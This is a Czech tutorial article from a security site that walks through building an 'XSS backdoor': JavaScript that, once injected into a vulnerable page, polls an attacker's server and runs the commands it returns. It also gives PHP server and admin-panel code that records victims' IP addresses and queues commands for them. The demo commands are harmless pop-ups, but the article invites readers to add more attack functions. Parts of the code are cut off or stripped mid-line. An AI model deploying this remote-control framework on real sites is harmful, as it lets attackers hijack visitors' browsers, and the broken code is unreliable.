Tvorba vlastního XSS backdooru

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: .cCuMiNn.
Datum: 6.4.2011
Hodnocení/Hlasovalo: 1.33/9

Po úvodních článcích věnovaných XSS backdoorům, ve kterých jsme si představili nástroje BeEF a XSS Shell, přišel čas, abychom se tomuto druhu aplikací podívali pod kapotu a vytvořili si konečně svůj vlastní XSS backdoor.

V uvedených článcích jsme si již řekli, že aplikace typu XSS backdoor je postavena na bázi klient-server. Klienta přitom představuje kód JavaScriptu spuštěný ve webovém prohlížeči, který v pravidelných intervalech odesílá na webový server útočníka HTTP požadavky. Pomocí proměnných v jednotlivých requestech může předávat data na stranu serveru a z odpovědí vrácených na zaslané požadavky může získávat příkazy připravené útočníkem.

Samotné odesílání požadavků na straně klienta je nejjednodušší zařídit využitím funkce setInterval(), která se postará o provedení akce v pravidelných intervalech a objektu XMLHttpRequest (respektive XdomainRequest), který zařídí skryté odesílání požadavků na pozadí napadené webové aplikace. Samotný kód klienta, který disponuje útočnými funkcemi omezenými pouze na alert a prompt, je opravdu velice jednoduchý. Prohlédnout si jej můžete v následujícím výpisu.function pozdrav() {alert("Ahoj uživateli")}
function dotaz() {odpoved = prompt("Jak se jmenuješ?")}

function sendXMLHttpRequest(answ) {
 answ = answ?"&odpoved="+answ:"";
 xhr = window.XDomainRequest?new XDomainRequest():new XMLHttpRequest();
 if (xhr) {
  xhr.open("GET", "http://www.soom.cz/projects/XSSbackdoorDemo/xssproxyserver.php?idclient=" + answ, true);
  xhr.onload = zpracujOdpoved;
  xhr.send(null);
  odpoved="";
 }
}

function zpracujOdpoved() {
 var prikaz = xhr.responseText;
 if (prikaz == "pozdrav") pozdrav();
 if (prikaz == "dotaz") dotaz();
}

var odpoved = "";
setInterval("sendXMLHttpRequest(odpoved)", 5000);

Stejně jednoduchý je také kód serverové části XSS backdooru. Tu je možné založit na použití databáze, nebo souborů. Já zvolil použití souborů, přičemž každému z klientů jsou přiřazeny soubory s příponou .dat (slouží jako zdroj informací o čase posledního přístupu klienta a o jeho IP adrese), .out (obsahuje příkazy zadané útočníkem) a .in (obsahuje odpovědi klienta). Vzhledem k tomu, že jsou při použití XSS backdooru jednotlivé požadavky zasílány napříč doménami, je důležité použití HTTP hlavičky Access-Control-Allow-Origin: povolující komunikaci s jinou doménou.


\n", FILE_APPEND);
 if (getenv('HTTP_X_FORWARDED_FOR'))
  $ipel = htmlspecialchars(trim(getenv('REMOTE_ADDR').'/'.getenv('HTTP_X_FORWARDED_FOR')));
 else
  $ipel = htmlspecialchars(trim(getenv('REMOTE_ADDR')));
 file_put_contents("clients/$idclient.dat", $ipel);
 if (file_exists("clients/$idclient.out") && trim(file_get_contents("clients/$idclient.out")) != '') {
  readfile("clients/$idclient.out");
 }
 file_put_contents("clients/$idclient.out", "");
?>

Ačkoliv již máme vytvořeny obě části XSS backdooru (klienta i server), stále nám ještě něco chybí. Tou chybějící částí skládanky je administrační rozhraní, pomocí kterého může útočník zadávat příkazy jednotlivým klientům a číst jejich odpovědi. Kód této části aplikace zobrazuje následující výpis.
 
  
  
  
  XSS backdoor admin
 
 
  

XSS backdoor admin

= 500) unlink($filename); } foreach (glob("clients/*.dat") as $filename) { $ipAddress = file_get_contents($filename); $idClientFile = substr($filename, 8, strlen($filename)-12); if ((time() - filectime($filename)) >= 15) { unlink($filename); if (file_exists("clients/".$idClientFile.".out")) unlink ("clients/".$idClientFile.".out"); if (file_exists("clients/".$idClientFile.".in")) unlink ("clients/".$idClientFile.".in"); } echo "$ipAddress
"; echo "".StrFTime("%d.%m.%Y %H:%M", filectime($filename))."
"; if (file_exists("clients/".$idClientFile.".out")) { readfile("clients/".$idClientFile.".out"); } echo "

"; } ?>


Testovací klient

V praxi si celý XSS backdoor můžete vyzkoušet na webové adrese http://www.soom.cz/projects/XSSbackdoorDemo/xssproxyadmin.php, kde najdete administrační rozhraní tohoto nástroje. Pro injektáž klientské části je nutné do zranitelné aplikace propašovat tento kód:Pokud se vám myšlenka vytvoření vlastního XSS backdooru líbí, můžete jej snadno rozšířit o další útočné funkce. Inspirovat se můžete například v sérii článků Útočný JavaScript, který naleznete rovněž zde na SOOM.cz.

Plánujeme také zprovoznění plnohodnotného XSS backdooru v podobě on-line projektu zde na SOOMu. Tohoto úkolu se ujal Fil-kun a myslím si proto, že se máme na co těšit.